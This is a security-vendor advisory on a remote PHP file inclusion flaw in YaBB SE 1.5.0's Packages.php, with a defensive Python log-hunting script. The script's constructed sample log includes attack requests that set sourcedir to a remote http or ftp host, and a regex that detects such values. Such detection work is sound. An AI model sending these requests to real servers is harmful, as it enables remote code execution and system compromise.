YaBB.SE.Packages.php.Remote.File.Inclusion
Description
This indicates a possible exploit of a PHP code inclusion vulnerability in the YaBB software package.
YaBB (Yet Another Bulletin Board) is an open-source bulletin board system for any system. A vulnerability has been reported in it that may allow an attacker to execute arbitrary PHP code on the vulnerable system. The vulnerability is in the Packages.php script, which uses the undefined variable $sourcedir. A remote attacker may send a specially crafted URL request directly to the Packages.php script that specifies the Packer.php script from a remote system as a parameter, which would allow the attacker to execute code on the vulnerable Web server.
Affected Products
YaBB SE 1.5.0 and earlier versions.
Impact
Compromise of the affected system.
Recommended Actions
Apply vendor supplied patches.
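The request pattern given in the Description (a direct request to Packages.php that supplies sourcedir as a parameter) can be hunted for in web server access logs. The script below is an added example, not part of the original advisory or of any vendor signature; it assumes common/combined log format, and the log entries, addresses, hosts and /forum/ path are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Client address and request target from a common/combined-format entry (assumed format).
REQUEST_RE = re.compile(r'^(?P<client>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Value begins with a URL scheme (two or more characters, so "C:" is not matched),
# a protocol-relative "//" or a UNC "\\" prefix: the include would leave this host.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]+:|//|\\\\)', re.I)

def classify(line):
    """Return (client, verdict, value) if the request sets sourcedir on Packages.php."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    # Decode the path so a %-encoded script name still matches; ignore case.
    script = unquote(url.path).rsplit("/", 1)[-1].lower()
    if script != "packages.php":
        return None
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        # Treat sourcedir, sourcedir[] and sourcedir[key] as the same variable.
        if name.lstrip().split("[", 1)[0] == "sourcedir":
            verdict = "remote-include" if REMOTE_RE.match(value) else "variable-override"
            return (m.group("client"), verdict, value)
    return None

def hunt(lines):
    """Classify every log line and keep only the suspicious requests."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample entries (documentation addresses, hypothetical /forum/ path).
SAMPLE_LOG = [
    '198.51.100.23 - - [01/Jan/2004:10:00:01 +0000] "GET /forum/index.php?board=1 HTTP/1.1" 200 5120',
    '203.0.113.50 - - [01/Jan/2004:10:00:07 +0000] "GET /forum/Packages.php?sourcedir=http://files.example.net/ HTTP/1.0" 200 312',
    '203.0.113.50 - - [01/Jan/2004:10:00:09 +0000] "GET /forum/packages.php?sourcedir=ftp%3A%2F%2Ffiles.example.net%2F HTTP/1.0" 200 0',
    '198.51.100.23 - - [01/Jan/2004:10:02:30 +0000] "GET /forum/Packages.php?sourcedir=/tmp HTTP/1.1" 200 99',
]

if __name__ == "__main__":
    for client, verdict, value in hunt(SAMPLE_LOG):
        print(f"{verdict:18} {client:15} sourcedir={value}")
```

Any hit is worth reviewing, because the variable is not one a client is meant to set; a "remote-include" verdict means the supplied value pointed at another host.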
Coverage
IPS (Regular DB)
IPS (Extended DB)